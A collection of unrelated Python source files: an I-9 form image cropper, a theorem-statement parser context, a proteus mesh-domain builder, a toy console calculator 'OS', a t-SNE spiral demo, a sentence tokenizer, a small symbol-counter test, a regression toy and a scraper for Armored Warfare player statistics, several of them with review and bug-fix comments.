'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
# Field crop boxes for the 07/17/17 revision (pages 1 and 2).  Most boxes
# are fractions of the page size; some (Alien/AdmissionNo*, WorkAuthorization,
# TranslatorLN/FN) are still raw pixel coordinates -- presumably measured on
# one specific scan resolution; TODO confirm and normalise.
image_coords_071717_pg1 = {'LastName':(.077*width,.229*height,.356*width,.271*height),
'FirstName': (.355*width,.233*height,.597*width,.272*height),
'DateOfBirth': (.077*width,.3034*height,.26*width,.3465*height),
'SocialSecurity': (.26*width,.305*height,.452*width,.349*height),
'Attestation': (.077*width,.405*height,.108*width,.49*height),
'Alien/AdmissionNo1': (2800,3210,3850,3350),
'Alien/AdmissionNo2': (1900,3740,3100,3950),
'Alien/AdmissionNo3': (1420,3930,3100,4160),
'Alien/AdmissionNo4': (1350,4110,3100,4320),
'StreetAddress': (.077*width,.266*height,.41*width,.306*height),
'City': (.505*width,.271*height,.745*width,.309*height),
'State': (.746*width,.271*height,.81*width,.309*height),
'Zip': (.81*width,.271*height,.948*width,.311*height),
'WorkAuthorization': (2880,3350,3620,3500),
'TranslatorLN': (420,5440,2650,5680),
'TranslatorFN': (2660,5430,4600,5680),
'DocumentTitle': (),
'DocumentNumber': (),
'DateOfHire': (),
'ApartmentNo': (.408*width,.271*height,.505*width,.309*height),
'MiddleInitial': (.596*width,.234*height,.696*width,.272*height),
'Email': (.450*width,.308*height,.731*width,.351*height),
'Telephone': (.729*width,.308*height,.948*width,.352*height)}
# Page 2 currently duplicates page 1's boxes verbatim.
image_coords_071717_pg2 = {'LastName':(.077*width,.229*height,.356*width,.271*height),
'FirstName': (.355*width,.233*height,.597*width,.272*height),
'DateOfBirth': (.077*width,.3034*height,.26*width,.3465*height),
'SocialSecurity': (.26*width,.305*height,.452*width,.349*height),
'Attestation': (.077*width,.405*height,.108*width,.49*height),
'Alien/AdmissionNo1': (2800,3210,3850,3350),
'Alien/AdmissionNo2': (1900,3740,3100,3950),
'Alien/AdmissionNo3': (1420,3930,3100,4160),
'Alien/AdmissionNo4': (1350,4110,3100,4320),
'StreetAddress': (.077*width,.266*height,.41*width,.306*height),
'City': (.505*width,.271*height,.745*width,.309*height),
'State': (.746*width,.271*height,.81*width,.309*height),
'Zip': (.81*width,.271*height,.948*width,.311*height),
'WorkAuthorization': (2880,3350,3620,3500),
'TranslatorLN': (420,5440,2650,5680),
'TranslatorFN': (2660,5430,4600,5680),
'DocumentTitle': (),
'DocumentNumber': (),
'DateOfHire': (),
'ApartmentNo': (.408*width,.271*height,.505*width,.309*height),
'MiddleInitial': (.596*width,.234*height,.696*width,.272*height),
'Email': (.450*width,.308*height,.731*width,.351*height),
'Telephone': (.729*width,.308*height,.948*width,.352*height)}
def crop(image_path, coords, saved_location):
    """Crop one region out of an image, save it, and display it.

    @param image_path: The path to the image to edit
    @param coords: A tuple of x/y coordinates (x1, y1, x2, y2)
    @param saved_location: Path to save the cropped image
    """
    region = Image.open(image_path).crop(coords)
    region.save(saved_location)
    region.show()
if __name__ == '__main__':
    #image = 'Python Crops/Original.png'
    # Gather every PNG in the source folder so the process repeats per file.
    folder_location = 'C:\\Users\\Brandon Croarkin\\Documents\\GreenZone\\OCR\\I9 Forms - PNG\\TextCleaned'
    images = [f for f in os.listdir(folder_location) if f.endswith(".png")]
    for image in images:
        # Base name without the extension, used to build unique output names.
        # Bug fix: the original did `image_names = image_names.append(...)`
        # (list.append returns None) and then referenced an undefined
        # `image_name` in the loop below.
        image_name = re.search(r'(.*?)(?=\.)', image).group()
        # Crop one sub-image per field of the 07/17/17 page-1 template.
        for key, value in image_coords_071717_pg1.items():
            crop(image, value, 'CroppedImages/' + image_name + '_' + key + '.png')
    #delete the original image so NiFi doesn't repeat the process on the image
    #os.remove('Python Crops/' + image)
    #croppedImages_Folder_Location = 'C:\\Users\\Brandon Croarkin\\Documents\\GreenZone\\OCR\\PythonCroppedImages'
    #croppedImages = []
    #for image in os.listdir(croppedImages_Folder_Location):
    #    if image.endswith(".png"):
    #        croppedImages.append(image)
    #
    #for image in croppedImages:
    #    originalFile = re.search('r(.*?)(?=\_)',image).group()
    #find original file (what comes before the underscore)
##################TESTING
##Below is just for testing for the coordinates
if __name__ == '__main__':
    # Ad-hoc probe: crop one hard-coded region of a sample page-2 form.
    image = 'i-9_06-05-07(Filled)page-2.png'
    im = Image.open('i-9_06-05-07(Filled)page-2.png')
    # NOTE(review): width/height are only bound here, *after* the module-level
    # coordinate dicts that reference them -- confirm the intended ordering.
    width, height = im.size
    crop(image, (.39*width,.57*height,.62*width,.585*height),
    'CroppedImages/Test.png')
|
from poc.classes.AuxISourceAnalyser import AuxISourceAnalyser
from poc.classes.AuxInterpretation import AuxInterpretation
from poc.classes.AuxContext import AuxContext
from poc.classes.ContextSignature import ContextSignature
class ContextTheoremLikeStatement:
    """Parsing-context handlers for theorem-like statements
    (theorem, proposition, lemma, corollary, conjecture)."""

    @staticmethod
    def start(i: AuxISourceAnalyser, parsing_info: AuxInterpretation):
        """Push the context matching the opening keyword, then start the signature."""
        keyword = parsing_info.get_cst()
        # Short and long keyword forms map to the same context.
        contexts = {
            'thm': AuxContext.theoremLikeStmtThm,
            'theorem': AuxContext.theoremLikeStmtThm,
            'prop': AuxContext.theoremLikeStmtProp,
            'proposition': AuxContext.theoremLikeStmtProp,
            'lem': AuxContext.theoremLikeStmtLem,
            'lemma': AuxContext.theoremLikeStmtLem,
            'cor': AuxContext.theoremLikeStmtCor,
            'corollary': AuxContext.theoremLikeStmtCor,
            'conj': AuxContext.theoremLikeStmtConj,
            'conjecture': AuxContext.theoremLikeStmtConj,
        }
        if keyword not in contexts:
            raise AssertionError("Unexpected keyword in ContextTheoremLikeStatement.start " + keyword)
        i.context.push_context(contexts[keyword], i.get_debug_parsing_info(parsing_info))
        ContextSignature.start(i, parsing_info)

    @staticmethod
    def stop(i: AuxISourceAnalyser, parsing_info: AuxInterpretation):
        """Pop whichever theorem-like context is active and record the interpretation."""
        candidates = (
            AuxContext.theoremLikeStmtThm,
            AuxContext.theoremLikeStmtProp,
            AuxContext.theoremLikeStmtLem,
            AuxContext.theoremLikeStmtCor,
            AuxContext.theoremLikeStmtConj,
        )
        for ctx in candidates:
            if i.context.is_parsing_context([ctx]):
                i.context.pop_context([ctx], i.get_debug_parsing_info(parsing_info))
                break
        else:
            raise AssertionError("Unexpected context in ContextTheoremLikeStatement.stop " + parsing_info.get_cst())
        i.pop_node()  # forget the theorem-like statement node
        i.parse_list.append(parsing_info)
|
# coding: utf-8
# In[218]:
import numpy as np
#import matplotlib.pyplot as plt
from proteus import SpatialTools as st
import os
from proteus import Domain
def get_yz(filename):
    """Return [0, y, z] for every STL point whose x matches the first
    point's x to within +/-0.01% (i.e. a cross-section slice)."""
    points = st.getInfoFromSTL(str(filename))[0]
    x0 = points[0][0]
    return [[0.0, p[1], p[2]]
            for p in points
            if 0.9999 * x0 <= p[0] <= 1.0001 * x0]
def yz2xy(yz):
    """Project [x, y, z] triples to [y, z] pairs, sorted by ascending y."""
    pairs = ([p[1], p[2]] for p in yz)
    return sorted(pairs, key=lambda pair: pair[0])
def clipds(vrts):
    """Drop vertices strictly between x=426 and the downstream end
    (x of the third-from-last vertex)."""
    end_x = vrts[-3][0]
    return [v for v in vrts if not (426 < v[0] < end_x)]
def clipus(vrts):
    """Drop vertices strictly between the upstream start (first vertex's x)
    and x=303."""
    beg_x = vrts[0][0]
    return [v for v in vrts if not (beg_x < v[0] < 303)]
#def plots(fig):
# plt.figure(figsize=(40,10))
# plt.scatter(np.array(fig)[:,0],np.array(fig)[:,1])
# plt.show()
def v_flags(vertices, boundaryTags):
    """Tag every vertex 'bottom' except the last three, which are the
    outflow, top and inflow corners (in that order)."""
    n = len(vertices)
    tail = {n - 3: 'outflow', n - 2: 'top', n - 1: 'inflow'}
    return [boundaryTags[tail.get(idx, 'bottom')] for idx in range(n)]
def segs(vertices):
    """Return closed-loop segments [i, i+1], with the last segment wrapping
    back to vertex 0.

    Bug fix: removed the dead local ``a = []`` that the original re-created
    on every iteration without ever using.
    """
    n = len(vertices)
    return [[i, (i + 1) % n] for i in range(n)]
def s_flags(segments, boundaryTags):
    """Tag every segment 'bottom' except the last three, which are the
    outflow, top and inflow edges (in that order)."""
    n = len(segments)
    tail = {n - 3: 'outflow', n - 2: 'top', n - 1: 'inflow'}
    return [boundaryTags[tail.get(idx, 'bottom')] for idx in range(n)]
def geom_transform(vertices):
    """Translate the polygon so its minimum x and y become 0.

    Mutates (and returns) the input list; each entry is rebuilt as a
    two-element list.
    """
    arr = np.array(vertices)
    x0 = arr[:, 0].min()
    y0 = arr[:, 1].min()
    for idx, (vx, vy) in enumerate(vertices):
        vertices[idx] = [vx - x0, vy - y0]
    return vertices
def top(vertices, top):
    """Force the last two vertices (the top corners) to elevation ``top``.

    Mutates and returns ``vertices``.
    """
    for idx in (-1, -2):
        vertices[idx][1] = top
    return vertices
def ups_len(vertices, upslen):
    """Reset the upstream extension to length ``upslen``.

    Shifts every interior vertex (all but the first and last) in x by
    ``upslen - (x1 - x0)``.  ``None`` leaves the vertices untouched.
    Mutates and returns ``vertices``.
    """
    if upslen is None:
        return vertices
    current = vertices[1][0] - vertices[0][0]
    for idx in range(1, len(vertices) - 1):
        vertices[idx][0] = vertices[idx][0] - current + upslen
    return vertices
def dwns_len(vertices, dwnslen):
    """Reset the downstream extension to length ``dwnslen``.

    Shifts the two vertices just before the last one in x by
    ``dwnslen - (x[-3] - x[-4])``.  ``None`` leaves the vertices
    untouched.  Mutates and returns ``vertices``.
    """
    if dwnslen is None:
        return vertices
    current = vertices[-3][0] - vertices[-4][0]
    n = len(vertices)
    for idx in range(n):
        if n - 4 < idx < n - 1:
            vertices[idx][0] = vertices[idx][0] - current + dwnslen
    return vertices
def deldup(vertices):
    """Remove consecutive duplicate vertices, keeping first occurrences.

    Bug fix: the original indexed ``vertices[0]`` unconditionally and so
    raised IndexError on an empty input; an empty list now returns [].
    """
    if not vertices:
        return []
    result = [vertices[0]]
    for prev, curr in zip(vertices, vertices[1:]):
        if curr != prev:
            result.append(curr)
    return result
def makecsv():
    """Assemble the 2D flow-domain outline from the STL parts and write the
    full bed, raw domain and clipped domain as CSV files."""
    bed = get_yz('bed1.stl') + get_yz('bed2.stl') + get_yz('conc.stl')
    np.savetxt("full_bed.csv", bed, delimiter=",")
    outline = yz2xy(bed)
    # Close the domain with two top corners at the outlet's maximum z.
    outline.append([max(np.array(outline)[:, 0]),
                    max(np.array(get_yz('outlet.stl'))[:, 2])])
    outline.append([min(np.array(outline)[:, 0]),
                    max(np.array(get_yz('outlet.stl'))[:, 2])])
    clipped = deldup(clipus(clipds(outline)))
    np.savetxt("domain.csv", outline, delimiter=",")
    # np.savetxt("domain_clip.csv", clipus(clipds(outline)), delimiter=",")
    np.savetxt("domain_clip.csv", clipped, delimiter=",")
# --- module-level driver: boundary tags and flags for the clipped outline ---
boundaries=['bottom','outflow','top','inflow']
# Tag ids start at 1 in enumeration order: bottom=1, outflow=2, top=3, inflow=4.
boundaryTags=dict([(key,i+1) for (i,key) in enumerate(boundaries)])
# NOTE(review): assumes makecsv() has already produced domain_clip.csv;
# importing this module without that file raises an error -- confirm intended use.
vertices=np.genfromtxt("domain_clip.csv", delimiter=",").tolist()
vertexFlags=v_flags(vertices,boundaryTags)
segments=segs(vertices)
segmentFlags=s_flags(segments,boundaryTags)
|
"""
Author: Thomas.JR
THMS OPERATING SYSTEM
version: pre-alpha v.0.0.010
"""
#program functions
def help():
    """Interactive "System Helper" shell.

    Note: deliberately shadows the ``help`` builtin inside this script;
    mainIe() dispatches "/help" here.  Bug fixes: closed the unbalanced
    parenthesis in the version banner and corrected the "Invaild" typo in
    the error message.
    """
    def git():
        # Print the helper banner and the available guideline commands.
        print("Welcome to System Helper. (VERSION: 0.00.1)")
        print("Use these commands to make guidelines:")
        print(" /help.settings: To make guidelines for SETTINGS Program")
    def chekk():
        # NOTE(review): recurses on every branch, so this loop only ends by
        # exhausting the recursion limit -- confirm whether an exit command
        # is intended.
        hihelp = str(input(">>> "))
        if hihelp == "/help.settings":
            print("Awesome!")
            chekk()
        else:
            print("Invalid function!")
            chekk()
    git()
    chekk()
def iSolver():
    """Interactive expression calculator.

    Greets the user, lists four expressions, and loops on commands until
    'exit' hands control back to mainIe().  Bug fixes: (1) the prompt in
    errorStartAgain() contained an unquoted dash run that broke the string
    literal; (2) the greeting advertised "(4) x^3 + y^3 + y^2" although
    experession4 computes x^3 + y^3 + z^3; (3) experession4's result text
    said "Expression 2" / "x,y" for three inputs; (4) finisher()'s
    'try_again' always re-ran experession3 -- it now repeats the expression
    that just finished (defaulting to experession3 as before).
    """
    # messages
    hello = "\nHi! Welcome to iSolver!"
    greeting = "\nChoose the experession that linked to numbers to solve! \n (1) (x+y+z)^2 \n (2) (x+y)^n \n (3) ((x^2)-x)/(n-x) \n (4) x^3 + y^3 + z^3"

    def experession1():  # (x+y+z)^2
        x = int(input("-------\nType x:"))
        y = int(input("-------\nType y:"))
        z = int(input("-------\nType z:"))
        p = "(%d + %d + %d)^2" % (x, y, z)
        onesum = (x + y + z) ** 2
        print("------------------------------------------------------\nExpression 1: %s \n Input x,y,z respectively: %d, %d, %d \n Value of experession: %d" % (p, x, y, z, onesum))
        print("-------------------------------")
        finisher(experession1)

    def experession2():  # (x+y)^n
        x = int(input("-------\nType x:"))
        y = int(input("-------\nType y:"))
        n = int(input("-------\nType exponent number:"))
        p = "(%d + %d)^%d" % (x, y, n)
        twosum = (x + y) ** n
        print("------------------------------------------------------\nExpression 2: %s \n Input x,y respectively: %d, %d \n Exponent: %d \n Value of experession: %d" % (p, x, y, n, twosum))
        print("-------------------------------")
        finisher(experession2)

    def experession3():  # ((x^2)-x)/(n-x)
        x = int(input("-------\nType x:"))
        n = int(input("-------\nType n:"))
        if x == n:
            # x == n would divide by zero; report and offer the menu again.
            print("SystemError: This will lead to division by zero! \n")
            print("-------------------------------------")
            finisher(experession3)
        else:
            p = "((%d^2)-%d)/(%d-%d)" % (x, x, x, n)
            threesum = ((x ** 2) - x) / (n - x)
            print("------------------------------------------------------\nExpression 3 %s \n Input x,n respectively: %d, %d \n Value of experession: %d" % (p, x, n, threesum))
            print("-------------------------------")
            finisher(experession3)

    def experession4():  # x^3 + y^3 + z^3
        x = int(input("-------\nType x:"))
        y = int(input("-------\nType y:"))
        z = int(input("-------\nType z:"))
        p = "%d ^ 3 + %d ^ 3 + %d ^ 3" % (x, y, z)
        foursum = x**3 + y**3 + z**3
        print("------------------------------------------------------\nExpression 4: %s \n Input x,y,z respectively: %d, %d, %d \n Value of experession: %d" % (p, x, y, z, foursum))
        print("-------------------------------")
        finisher(experession4)

    def finisher(retry=None):
        """Post-result menu; retry repeats the expression that just ran."""
        if retry is None:
            retry = experession3  # original fallback behavior
        command = str(input("Execute: \n try_again : if you want to try this expression again \n try_other: if you want to try another expression \n exit: if you don't want to calculate any more \n \n >>>"))
        if command == "try_again":
            retry()
        elif command == "try_other":
            print("-------------------------")
            main()
        elif command == "exit":
            exIt()

    def sTaRt():
        greeTer()
        kUrso()

    def kUrso():
        # Top-level command loop inside the solver.
        stringTo = str(input("\n>>> "))
        if stringTo == "calExper":
            main()
        else:
            print("Function undefined.\n")
            liSt()
            kUrso()

    def liSt():
        print("What do you want to do?\n -calExper: Calculate listed experessions.")

    def greeTer():
        print(hello)
        liSt()

    def main():  # expression-selection menu
        print(greeting)
        exchoice = int(input("Choose the type of experession you want to solve\n>>> "))
        if exchoice == 1:
            experession1()
        elif exchoice == 2:
            experession2()
        elif exchoice == 3:
            experession3()
        elif exchoice == 4:
            experession4()
        else:
            print("Experession unavailable!")
            errorStartAgain()

    def errorStartAgain():
        # Re-prompt after an invalid menu choice.
        excher = int(input("Please type the number that represents the experession in the list! \n-------------------------\n>>> "))
        if excher == 1:
            experession1()
        elif excher == 2:
            experession2()
        elif excher == 3:
            experession3()
        elif excher == 4:
            experession4()
        else:
            print("Experession unavailable!")
            errorStartAgain()

    def exIt():
        # Leave the solver and return to the OS shell prompt.
        print("Thanks for using our product!")
        mainIe()

    # Start the solver.
    sTaRt()
#variables
# System banner shown once at startup.
cRedits = "THMS OPERATING SYSTEM \nCopyright 2017, Thms Studios.\nVersion: pre-alpha v.0.0.001"
#system information
print(cRedits)
#system functions
def mainIe():
    """Top-level OS prompt: read one command, dispatch it, or report it as
    unrecognized and prompt again."""
    start = str(input("\nC:\THMS >>> "))
    if start in ("prg(iSolver)", "iSolver"):
        iSolver()
    elif start == "shutdown":
        shutDown()
    elif start == "/help":
        help()
    else:
        print("'%s' is not recognized as an internal or external command, operable program or batch file !" % (start))
        mainIe()
def shutDown():
    """Print the farewell message; returning ends the command loop."""
    print("Goodbye!")
#user command input
# Start the top-level prompt when the script runs.
mainIe()
|
# libray imports
import winsound
import numpy as np
from sklearn import manifold
# application imports.
from data_generator import generate_data_gausian_archimedean_spiral
from data_visualization import plot_data
def sound(f, p, n):
    """Beep n times at frequency f for duration p (Windows winsound)."""
    for _ in range(n):
        winsound.Beep(f, p)
# Function: Main program function.
def main():
    """Generate a noisy two-arm Archimedean-spiral dataset, plot it, and
    optionally embed it in 2-D with t-SNE (plotting the embedding too)."""
    # Audible start cue.
    sound(200, 80, 2)

    # Data-generation parameters.
    center_x = 0.5
    center_y = 0.5
    turns = 2.0
    noise_sigma = 0.03
    arms = 2
    sample_count = 1000 * 8
    manifold_enabled = True

    # Generate the raw spiral samples.
    samples = generate_data_gausian_archimedean_spiral([], center_x, center_y, noise_sigma, turns, arms, sample_count)

    # Plot the raw data.
    plot_data(np.array(samples), markersize=1, alpha=0.5, auto_limit_enabled=True)

    # Learn and plot a t-SNE embedding of the same samples.
    if manifold_enabled:
        embedder = manifold.TSNE(n_components=2, perplexity=20, init='pca', random_state=0)
        embedding = embedder.fit_transform(samples)
        plot_data(np.array(embedding), markersize=1, alpha=0.5, auto_limit_enabled=False)

    # Report and signal completion.
    print('data_count = ' + str(len(samples)))
    sound(12000, 80, 2)
# Program entry point.
# NOTE(review): runs unconditionally on import; consider guarding with
# `if __name__ == '__main__':`.
main ()
"""
Author: Marion Owera
Date Written: Feb 25, 2018
Description: Temporary sent_tokenizer lang to, may problema pa kasi dun sa tokenizer ni Jeremy.
"""
import re
import json
def sent_tokenize(inp, fh=False):
    """Split commas/quotes (and one trailing non-word char) away from words and
    return the whitespace-split token list; if fh is truthy, also dump the
    tokens as JSON to et/data/temp/sent_tokenizer.json."""
    sym = r"([,\"\'])"
    # Peel separators out of word runs, widest pattern first, then the edges.
    inp = re.sub(r"(\w+)" + sym + r"(\w+)" + sym + r"(\w+)", r"\1 \2 \3 \4 \5", inp)
    inp = re.sub(r"(\w+)" + sym + r"(\w+)", r"\1 \2 \3", inp)
    inp = re.sub(sym + r"(\w+)", r"\1 \2", inp)
    inp = re.sub(r"(\w+)" + sym, r"\1 \2", inp)
    inp = re.sub(r"(\w+)(\W)$", r"\1 \2", inp)
    tokens = inp.split()
    if fh:
        with open("et/data/temp/sent_tokenizer.json", "w") as dump_file:
            dump_file.write(json.dumps(tokens, indent=4))
    return tokens
def sent_tokenize_multi(inp, fh=False):
    """Tokenize each string in `inp` with sent_tokenize and return the list of
    token lists; if fh is truthy, dump the combined result as JSON.

    BUG FIX: the original opened the dump file and never closed it; a context
    manager now guarantees the close/flush.
    NOTE(review): per-item calls deliberately do not forward `fh` (only the
    combined result is dumped) — confirm that is intended.
    """
    ans = [sent_tokenize(item) for item in inp]
    if fh:
        with open("et/data/temp/sent_tokenizer.json", "w") as dump_file:
            dump_file.write(json.dumps(ans, indent=4))
    return ans
if __name__=="__main__":
    # Smoke test: tokenize two sample sentences and dump the result to JSON.
    print(sent_tokenize_multi(["Banana,Mango,Apple2,etc. I like them all, but, it's bad.","The dog is cute!"],True))
|
import sys
sys.path.insert(1, "../lua")
import Sym
class TestSym:
    """Smoke test for the Sym symbol-counter: feeds a fixed string and checks
    the mode and (truncated) entropy against known values."""

    def testSym(self):
        """Return 0 if Sym reports the expected mode/entropy for "aaaabbc", else 1."""
        text = "aaaabbc"  # renamed: the original shadowed the builtin `str`
        counter = Sym.Sym(0, "symbols")
        for ch in text:
            counter.add(ch)
        mode = counter.mid()
        entropy = counter.div()
        # Truncate (not round) to three decimal places.
        entropy = (1000*entropy//1)/1000
        print(" Mode =", mode)
        print("Entropy =", entropy)
        ok = mode == "a" and 1.38 >= entropy >= 1.37
        return 0 if ok else 1
if __name__ == '__main__':
    # BUG FIX: the original called the instance method through the class with a
    # dummy argument (TestSym.testSym(1)); construct an instance and call normally.
    result = TestSym().testSym()
    print(result)
|
import numpy as np
from sklearn.datasets import load_boston
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
# Fit a 3-feature linear regression on a tiny hand-made dataset and print the
# fitted equation. (Dead assignments that were immediately overwritten and
# commented-out experiments have been removed.)
X = [[10,20,30],[2,3,4], [5,6,8]]
Y = [14565, 654, 765]
X = np.array(X)
Y = np.array(Y)
print(X.shape,Y.shape)
model = LinearRegression()
model = model.fit(X, Y)
# One coefficient per feature, plus the intercept.
beta_1 = model.coef_[0]
beta_2 = model.coef_[1]
beta_3 = model.coef_[2]
beta_0 = model.intercept_
print("Y =",beta_0,beta_1,"x1+", beta_2,"x2+",beta_3,"x3")
# Separate experiment: column-wise mean of a small 3x3 matrix.
Dataset = []
Dataset.append([1, 2, 3])
Dataset.append([3, 4, 5])
Dataset.append([6, 7, 8])
kwon = np.array(Dataset)
a = np.mean(Dataset, axis=0)
|
"""
MIT License
Copyright (c) 2020-2021 Dmitriy Trofimov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import re
import requests
import logging
from typing import Union, Dict, List, Optional
from enum import Enum
from bs4 import BeautifulSoup, Tag
from .exceptions import UserHasClosedStatisticsException, UserNotFoundException, BadHTTPStatusCode, NotAuthException, \
BattalionNotFound, BattalionSearchTooShortQuery, BattalionSearchBattalionNotFound
from .player import PlayerStatistics
from .battalion import BattalionMemberEntry, BattalionSearchResultEntry
logger = logging.getLogger(__name__)
class GameMode(Enum):
    """Armored Warfare game-mode selector; values match the site's `mode`
    query-string parameter (see __get_player_statistic_page)."""
    PVP = 0
    PVE = 1
    LOW = 2
    GLOPS = 3
    RANKED = 4
    RB = RANKED  # alias for RANKED
class API:
    """Scraping client for the Armored Warfare (armata.my.games) player and
    battalion statistics pages.

    CHANGE: the user-closed-statistics check now compares against the
    ``self.__CLOSED_STAT`` constant instead of a duplicated hard-coded literal.
    """

    def __init__(self, raw_cookie: Optional[List[Dict]] = None):
        """
        :param raw_cookie :class:`Optional[Dict, List]`
            containing exported with "EditThisCookie" Chrome extension cookie from aw.mail.ru
        """
        # Paragraph that shows if we are not authenticated on site
        self.__NOT_AUTH_CHECK = [
            '<p>Для просмотра данной страницы вам необходимо авторизоваться или <a href="/user/register/">зарегистрироваться</a> на сайте.</p>',
            '<p>Для просмотра данной страницы вам необходимо авторизоваться или <a href="" onclick="__GEM.showSignup();return false;" target="_blank">зарегистрироваться</a> на сайте.</p>'
        ]
        self.__NOT_AUTH_CHECK_BATTALION = '<div class="node_notice warn border">Необходимо авторизоваться.</div>'
        # Div with text shows that user closed his statistics
        self.__CLOSED_STAT = '<div class="node_notice warn border">Пользователь закрыл доступ!</div>'
        # Div with text shows that player with given nickname does not exist
        self.__PLAYER_NOT_EXISTS = '<div class="node_notice warn border">Пользователь не найден!</div>'
        # Base URL for player statistics
        self.__user_stats_url = 'https://armata.my.games/dynamic/user/?a=stats'
        # Base URL for battalion page
        self.__battalion_stats_url = 'https://armata.my.games/dynamic/aliance/index.php?a=index'
        # Session that will contain cookies
        self.__session: requests.Session = requests.Session()
        # Dict with cookies
        self.__cookie: Union[Dict, List, None] = None
        if raw_cookie:
            self.__cookie = self.__prepare_cookie(raw_cookie)

    # Clean HTML from tags to extract only data
    @staticmethod
    def __clean_html(raw_html):
        """Strip every HTML tag from `raw_html` and return the remaining text."""
        cleanr = re.compile('<.*?>')
        cleantext = re.sub(cleanr, '', raw_html)
        return cleantext

    @classmethod
    def __extract_battles_per_level(cls, level_stats: List[Tag]) -> List[int]:
        """Pull the battle count out of each per-level stats tag (second-to-last child)."""
        battles = []
        for item in level_stats:
            children = list(item.children)
            battles.append(int(cls.__clean_html(str(children[-2]))))
        return battles

    @staticmethod
    def __calculate_level_sum(level_stats: List[int]) -> int:
        """Weight each battle count by its 1-based vehicle level and return the sum
        (used to compute the average vehicle level)."""
        total_sum = 0
        for index, item in enumerate(level_stats, 1):
            total_sum += index * item
        return total_sum

    @staticmethod
    def __prepare_cookie(raw_cookie: Union[Dict, List]) -> Dict:
        """
        :param raw_cookie :class:`Union[Dict, List]`: Raw cookie from EditThisCookie
        :return: :class:`dict` with "cleaned" cookies
        """
        new_cookie_dict = dict()
        for item in raw_cookie:
            new_cookie_dict[item['name']] = item['value']
        return new_cookie_dict

    def __get_page(self, url: str) -> str:
        """
        :param url :class:`str` URL to retrieve.
        :return: :class:`str` That contains decoded HTML page
        :raises BadHTTPStatusCode: on any non-200 response.
        """
        logger.info('Performing request to {0}'.format(url))
        request = self.__session.get(url, cookies=self.__cookie)
        if request.status_code == 200:
            page = request.content.decode('utf-8')
            return page
        logger.error('Got non 200 status code on request to {0}. Status code: {1}'.format(url, request.status_code))
        raise BadHTTPStatusCode(f'Got non 200 status code: {request.status_code}', status_code=request.status_code)

    def __get_player_statistic_page(self, nickname: str, mode: int, data: int, tank_id: int, day: int = 0,
                                    ajax: int = 0, maintype: int = 0) -> str:
        """
        :param nickname: Nickname of user to find.
        :param mode: Game mode Number from 0 to 4 {pvp, pve, low, glops, ranked}.
        :param data: CSA ID of player to find(overwrites user nickname) if not 0.
        :param tank_id: staticID of tank to find for(0 means overall stat for mode).
        :param day: Filter stats by some date/battle count.
        :param ajax: Is data should be returned like in ajax request (DONT CHANGE IT OR WILL BROKE).
        :param maintype: In-game type of vehicle(0 all types, 1 - MBT, 2 - LT, 3 - TD, 4 - AFV)
        :return: string with decoded HTML page
        """
        url = f'{self.__user_stats_url}&name={nickname}&mode={mode}&data={data}&type={tank_id}&maintype={maintype}&day={day}&ajax={ajax}'
        page = self.__get_page(url)
        return page

    def __get_player_statistics(self, page: str, nickname=None) -> PlayerStatistics:
        """
        :param page: string with HTML document
        :return: `PlayerStatistics` instance
        :raises NotAuthException, UserNotFoundException, UserHasClosedStatisticsException
        """
        # Let's parse the page
        page_parser = BeautifulSoup(page, "html.parser")
        # Get page "notifications" and look for error messages
        notifications = list(page_parser.find_all('p'))
        if not notifications:
            notifications = page_parser.find_all('div')
            notifications = list(notifications)
        # Check if we authenticated (if not, then notifications[0] will be equal to one of items in NOT_AUTH_CHECK )
        if str(notifications[0]) in self.__NOT_AUTH_CHECK:
            logger.error('Error on parsing page: Client is not authenticated')
            raise NotAuthException('I am not authenticated on aw.mail.ru')
        # Check if user exists( if user does not exist, then notifications[0] will be equal to PLAYER_NOT_EXISTS )
        if self.__PLAYER_NOT_EXISTS == str(notifications[0]):
            logger.warning('Player {} was not found'.format(nickname))
            raise UserNotFoundException(f'User {nickname} nickname was not found', nickname=nickname)
        # Check did user closed stats
        # CONSISTENCY FIX: compare against the shared constant instead of a
        # second hard-coded copy of the same markup.
        if self.__CLOSED_STAT == str(notifications[0]):
            logger.warning('Player {} has closed his statistics'.format(nickname))
            raise UserHasClosedStatisticsException(f'{nickname} closed his stats', nickname=nickname)
        # There is no errors, so go ahead and parse page for information
        nickname = self.__clean_html(str(page_parser.find("div", {"class": "name"}))).split('\n')[1]
        __battalion_info_dirty = page_parser.find('div', {'class': 'clan'})
        __battalion_tag_and_fullname_dirty = str(__battalion_info_dirty.contents[3]).split()
        battalion_tag = __battalion_tag_and_fullname_dirty[0].replace('<span>', '').replace('[', '').replace(']', '')
        battalion_full_name = __battalion_tag_and_fullname_dirty[1].replace('</span>', '').replace('[', '').replace(']',
                                                                                                                   '')
        if len(battalion_tag) == 0:
            battalion_tag = None
            battalion_full_name = None
        __battles_played_dirty = str(page_parser.find("div", {"class": "total"}))
        __battles_played_dirty = self.__clean_html(__battles_played_dirty).split()[-1].replace('сыграно', '')
        battles_played: int = int(__battles_played_dirty) if __battles_played_dirty else 0
        __average_damage_data = page_parser.findAll("div", {"class": "list_pad"})
        # renamed from __clean_html: the original shadowed the helper method's name
        __damage_block_text = self.__clean_html(str(__average_damage_data[3]))
        __parsed_data = __damage_block_text.split('\n')
        average_damage = __parsed_data[4]
